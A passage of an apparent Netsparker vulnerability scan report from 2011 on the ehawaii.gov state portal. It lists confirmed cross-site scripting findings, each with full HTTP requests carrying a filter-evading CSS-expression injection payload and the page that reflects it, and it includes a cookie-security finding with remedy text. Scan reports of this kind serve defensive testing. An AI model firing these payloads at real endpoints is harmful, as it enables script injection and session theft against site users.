class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value=""/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><div id="container"><div align="center"><div id="columnLeftSubpg"> <div id="subpage"> <div id="feedback"> <form action="/dakine/comment.html" method="post" style="display:inline; margin:0;"> <input type="hidden" name="applicationId" value="" stYle="x:expre/**/ssion(netsparker(9)) "/> <h1>Feedback</h1> <p>Did you find what you were looking for? <input name="foundLookingFor" type="radio" value="true" checked="checked"/> Yes <input name="foundLookingFor" type="radio" value="false" /> No</p> <p>If no, what were you looking for?<br /> <textarea name="lookingFor"></textarea> </p> <div id="linegrey"></div> <h3>Frequency</h3> <p>How often do you use eHawaiiGov?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white"> Daily</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">Weekly</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">Monthly</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">Sometimes</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">My 1st Time</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Ease of Use</h3> <p>Overall, how easy or difficult is it to use this site?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy </td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Navigation</h3> <p>Can information be located quickly and easily?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Appearance</h3> <p>Do you find the layout, design, colors and presentation of content attractive and pleasing?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Attractive</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Unattractive</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Content</h3> <p>Was the information adequate for your needs?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Excellent</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Poor</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <p>How did you find out about us?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="8" /> Newspaper Article <br /> <input type="checkbox" name="referrals" value="9" /> Government Agency <br /> <input type="checkbox" name="referrals" value="10" /> Television<br /> <input type="checkbox" name="referrals" value="11" /> Radio</td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="12" /> Direct Mail <br /> <input type="checkbox" name="referrals" value="13" /> Conference or Trade Show <br /> <input type="checkbox" name="referrals" value="14" /> AOL<br /> <input type="checkbox" name="referrals" value="15" /> Search Engine </td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="16" /> Referred by friend or colleague <br /> <input type="checkbox" name="referrals" value="17" /> Advertisement<br /> <input type="checkbox" name="referrals" value="18" /> Link from another website <br /> <input type="checkbox" name="referrals" value="19" /> Other</td> </tr> </table> <div id="linegrey"></div> Would you use this online service again? <input name="useServiceAgain" type="radio" value="true" checked="checked"/> Yes <input name="useServiceAgain" type="radio" value="false" /> No</p> <div id="linegrey"></div> What other Hawaii government services would you like t..
- /dakine/comment.html

/dakine/comment.html CONFIRMED

http://www.ehawaii.gov/dakine/comment.html

Parameters

Parameter Type Value
applicationId POST " stYle="x:expre/**/ssion(alert(9))
foundLookingFor POST false
lookingFor POST 3
frequency POST 7
ease POST 7
navigation POST 7
appearance POST 7
content POST 7
useServiceAgain POST false
otherServices POST 3
suggestions POST 3
email POST netsparker@example.com
Submit2 POST Submit

Request

POST /dakine/comment.html HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/comment.html?applicationId=73
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.ehawaii.gov
Cookie: JSESSIONID=193FEBC7F9504329AB2D46D5AF21141C.olomea
Content-Length: 255
Accept-Encoding: gzip, deflate

applicationId=%22+stYle%3d%22x%3aexpre%2f**%2fssion(netsparker(9))+&foundLookingFor=false&lookingFor=3&frequency=7&ease=7&navigation=7&appearance=7&content=7&useServiceAgain=false&otherServices=3&suggestions=3&email=netsparker%40example.com&Submit2=Submit

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:32:08 GMT
Server: Apache-Coyote/1.1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=5D4D9EDF7E9E7B3AFF77566B4C4A96F8.liona; Path=/dakine
Transfer-Encoding: chunked


<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>ehawaii.gov | Comments & Feedback</title><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value=""/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><div id="container"><div align="center"><div id="columnLeftSubpg"> <div id="subpage"> <div id="feedback"> <form action="/dakine/comment.html" method="post" style="display:inline; margin:0;"> <input type="hidden" name="applicationId" value="" stYle="x:expre/**/ssion(netsparker(9)) "/> <h1>Feedback</h1> <p>Did you find what you were looking for? <input name="foundLookingFor" type="radio" value="true" checked="checked"/> Yes <input name="foundLookingFor" type="radio" value="false" /> No</p> <p>If no, what were you looking for?<br /> <textarea name="lookingFor"></textarea> </p> <div id="linegrey"></div> <h3>Frequency</h3> <p>How often do you use eHawaiiGov?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white"> Daily</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">Weekly</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">Monthly</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">Sometimes</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">My 1st Time</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Ease of Use</h3> <p>Overall, how easy or difficult is it to use this site?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy </td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Navigation</h3> <p>Can information be located quickly and easily?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Appearance</h3> <p>Do you find the layout, design, colors and presentation of content attractive and pleasing?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Attractive</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Unattractive</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Content</h3> <p>Was the information adequate for your needs?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Excellent</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Poor</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <p>How did you find out about us?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="8" /> Newspaper Article <br /> <input type="checkbox" name="referrals" value="9" /> Government Agency <br /> <input type="checkbox" name="referrals" value="10" /> Television<br /> <input type="checkbox" name="referrals" value="11" /> Radio</td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="12" /> Direct Mail <br /> <input type="checkbox" name="referrals" value="13" /> Conference or Trade Show <br /> <input type="checkbox" name="referrals" value="14" /> AOL<br /> <input type="checkbox" name="referrals" value="15" /> Search Engine </td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="16" /> Referred by friend or colleague <br /> <input type="checkbox" name="referrals" value="17" /> Advertisement<br /> <input type="checkbox" name="referrals" value="18" /> Link from another website <br /> <input type="checkbox" name="referrals" value="19" /> Other</td> </tr> </table> <div id="linegrey"></div> Would you use this online service again? <input name="useServiceAgain" type="radio" value="true" checked="checked"/> Yes <input name="useServiceAgain" type="radio" value="false" /> No</p> <div id="linegrey"></div> What other Hawaii government services would you like to..
- /doh/vitrec/exe/vitrec.cgi

/doh/vitrec/exe/vitrec.cgi CONFIRMED

https://www.ehawaii.gov/doh/vitrec/exe/vitrec.cgi

Parameters

Parameter Type Value
form_name POST disclaimer
proceed POST Proceed
session_id POST /" stYle="x:expre/**/ssion(alert(9))

Request

POST /doh/vitrec/exe/vitrec.cgi HTTP/1.1
Referer: https://www.ehawaii.gov/doh/vitrec/exe/vitrec.cgi
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.ehawaii.gov
Content-Length: 103
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

form_name=disclaimer&proceed=Proceed&session_id=%2f%22+stYle%3d%22x%3aexpre%2f**%2fssion(netsparker(9))

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 22:40:31 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Connection: close


<html><head><title>DOH Online Vital Records Ordering || Disclaimer</title><LINK rel="stylesheet" href="/doh/vitrec/html/vitrec.css"></head><body bgcolor="#eff7ff"><div align="center"><!--<img src="/doh/vitrec/images/masterbanner.jpg" usemap="#Map" border="0" alt="eHawaiiGov Master Navigation Bar"> <map name="Map"> <area shape="rect" coords="0,2,130,48" href="http://www.ehawaiigov.org" target="_self" alt="Link to eHawaiiGov Home Page" title="Link to eHawaiiGov Home Page"> <area shape="rect" coords="130,1,296,48" href="http://www.ehawaiigov.org/online/html/all_svc.html" alt="State of Hawaii Online Services" title="State of Hawaii Online Services" target="_self"> <area shape="rect" coords="295,1,440,48" href="http://www.ehawaiigov.org/index/" target="_self" alt="Hawaii Information Link Index" title="Hawaii Information Link Index"> </map>--><img src="/doh/vitrec/images/vitrect_banner.jpg" border="0" alt="DOH Vital Records Banner"><br> <center> <table border="0" cellpadding="0" cellspacing="0" width="750"> <tr> <td align="center" class="subheads"><a href="/doh/vitrec/exe/vitrec.cgi">Home</a> || <a href="/doh/vitrec/html/contact.html">Contact Information</a> || <a href="http://www.ehawaiigov.org/cgi-bin/admin/feedback/exe/feedback.cgi?application_id=40" target="_blank">Feedback</a> || <a href="/doh/vitrec/exe/vitrec.cgi?form_name=disclaimer">Disclaimer</a></td> </tr> </table> <br> <font class="heads">DISCLAIMER</font><br> <table border="0" cellpadding="0" cellspacing="6" width="650"> <tr><td class="body" align="left"> The information and transactions completed on this web site are provided by the State of Hawaii Department of Health (DOH) as a public service. No posted information is intended to constitute legal or professional advice. The information available through this web site is NOT official information unless otherwise noted. </td></tr> <tr><td class="body" align="left"> This web site is intended for use by the public for the sole purpose of ordering vital records from the DOH. The information contained in this web site DOES NOT disclose any information found within the official vital records in the custody of the DOH. </td></tr> <tr><td class="body" align="left"> All information provided by the DOH through this web site is provided on an "as is" basis and DOH makes no warranties, express or implied, including Warranty of Merchantability and Fitness for a Particular Purpose, and makes no guarantees as to the accuracy of the information accessed, the timeliness of the delivery of the transactions, delivery to the correct party, preservation of privacy and security of users. No one shall be entitled to claim detrimental reliance on any views or information, whether provided by or accessed through this web site, or to claim any duty on the part of DOH to update posted information or to protect the interests of those accessing this web site. In no event shall the DOH, its divisions, employees or other parties be liable for damages of any nature whatsoever, arising from the use of or inability to use this website. The DOH uses reasonable efforts to provide accurate, complete and current information on this website; it does not, however, represent the information to be so. By accessing this web site, the user agrees that the DOH, its divisions, employees and other parties involved in creating, maintaining, or delivering the information contained therein shall be immune from any liability and damages arising from inaccuracies or incompleteness in the data provided. </td></tr><!-- <tr><td class="body" align="left"> The DOH issues only certified copies of birth certificates, and marriage certificates, which are acceptable for passport, social security, employment and personal identification purposes via mail. An applicant may only order his or her own certificate or one for an immediate family member. </td></tr> <tr><td class="body" align="left"> By completing the necessary online forms and submitting your credit card information you are authorizing the DOH / Hawaii Information Consortium to charge a standard search fee of $11.50. Any additional copies are charged $4.25 per copy. All copies will be certified. To order a certificate online, you must have a valid MasterCard, Visa, American Express or Discover Card. </td></tr>--><!-- <tr><td height="5">&nbsp; </td></tr>--> </table> <form action="/doh/vitrec/exe/vitrec.cgi" method="post"> <input type="hidden" name="form_name" value="disclaimer"> <input type="hidden" name="session_id" value="/" stYle="x:expre/**/ssion(netsparker(9))"> <table width="200"> <tr> <td> <input type="submit" name="proceed" class="body" value="I Agree and Wish to Proceed"> </td> <td> <input type="submit" name="proceed" class="body" value="I Don't Agree and Wish to Exit"> </td> </tr> </table> </form> </center></div></body></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /dakine/search.html

/dakine/search.html CONFIRMED

https://www.ehawaii.gov/dakine/search.html

Identified Cookie

JSESSIONID

Request

GET /dakine/search.html HTTP/1.1
Referer: https://www.ehawaii.gov/efile/images/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Cookie: JSESSIONID=5CEF4D56ACB92FD97643719FA8E4E93B.liona
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 22:16:51 GMT
Server: Apache-Coyote/1.1
Content-Encoding:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2257
Set-Cookie: JSESSIONID=81B7C0165A3ACDC1B9BCB7AB369DD3DF.lono; Path=/dakine
Connection: close


<?xml version="1.0"?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>ehawaii.gov | Search Results</title><!-- Meta Tags --><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta name="keywords" content="Hawaii.gov, Hawaii state portal, government" /><meta name="description" content="Connecting You to Hawai`i State Government. Online Services, Why wait inline? Get it done online." /><link rel="shortcut icon" href="/dakine/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><!--Calendar CSS file--><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> <div id="weather"> <div><span class="content"><span class="temperature">Honolulu:&nbsp;81.0 F (27.2 C)&nbsp;Partly Cloudy</span></span></div> </div> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value=""/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><style type="text/css"> #columnLeftSubpg #subpage iframe { width: 670px; }</style><div id="container" > <div align="center"><div id="columnLeftSR"> <span class="content"> <div id="matchingServices"> <h1 class="content">Matching Services</h1><span class="sr">Search results for:</span> <span class="sr2"></span><br/><br /><br/><br /><div id="linegrey"></div> No matches found. </div> </span></div><div id="columnRight"> <span class="content"> <p><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="noline"><img src="/dakine/images/feedback.jpg" border="0" alt="Feedback" /></a><a href="#" class="noline"></a></p> </div></span></div><div id="columnMiddleSR"> <span class="content"> <div id="matchingPages"> <h1 class="content">Matching Pages</h1><span class="sr">Search results for:</span> <span class="sr2"></span><br/><br /><br/><br /><div id="linegrey"></div> No matches found. </div> </span></div> </div></div><!-- START: Footer --></center></div><div id="footer" > <div id="footerContent" ><a href="/dakine/docs/about.html" class="copyrightLink">About Us</a><span class="copyrightDivider">|</span><a href="/dakine/docs/subscription.html" class="copyrightLink">Subscription Services</a><span class="copyrightDivider">|</span><a href="/dakine/docs/ada.html" class="copyrightLink">ADA Compliance</a><span class="copyrightDivider">|</span><a href="/dakine/docs/terms.html" class="copyrightLink">Terms of Use</a><span class="copyrightDivider">|</span><a href="/dakine/docs/privacy.html" class="copyrightLink">Privacy Policy</a><span class="copyrightDivider">|</span><a href="/dakine/docs/text.html" class="copyrightLink">Text Version</a><span class="copyrightDivider">|</span><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="copyrightLink">Feedback</a><br /> <span class="copyrighttext">&copy; 2010 HAWAII INFORMATION CONSORTIUM, LLC.</span> </div></div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-939376-1";urchinTracker();</script></body></html>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
